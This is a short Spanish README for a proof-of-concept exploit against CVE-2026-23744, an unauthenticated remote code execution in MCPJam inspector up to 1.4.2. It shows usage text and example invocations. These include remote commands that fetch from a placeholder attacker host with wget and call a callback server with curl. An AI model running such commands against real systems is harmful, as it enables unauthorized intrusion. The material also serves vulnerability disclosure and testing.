
Prueba de concepto de exploit para CVE-2026-23744, una ejecución remota de código no autenticada en MCPJam inspector <= 1.4.2, que permite la ejecución de comandos en objetivos vulnerables.
CVE-2026-23744
RCE en MCPJam inspector <= 1.4.2
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
usage: mcpjaminspector-unauth-rce.py [-h] --target TARGET --command COMMAND
options:
-h, --help show this help message and exit
--target TARGET Target e.g https://127.0.0.1
--command COMMAND Command to exec on remote target. e.g: wget http://YOU/f
python3 mcpjaminspector-unauth-rce.py --target "http://mymcp.local/" --command "curl http://myinteractsh.local/test"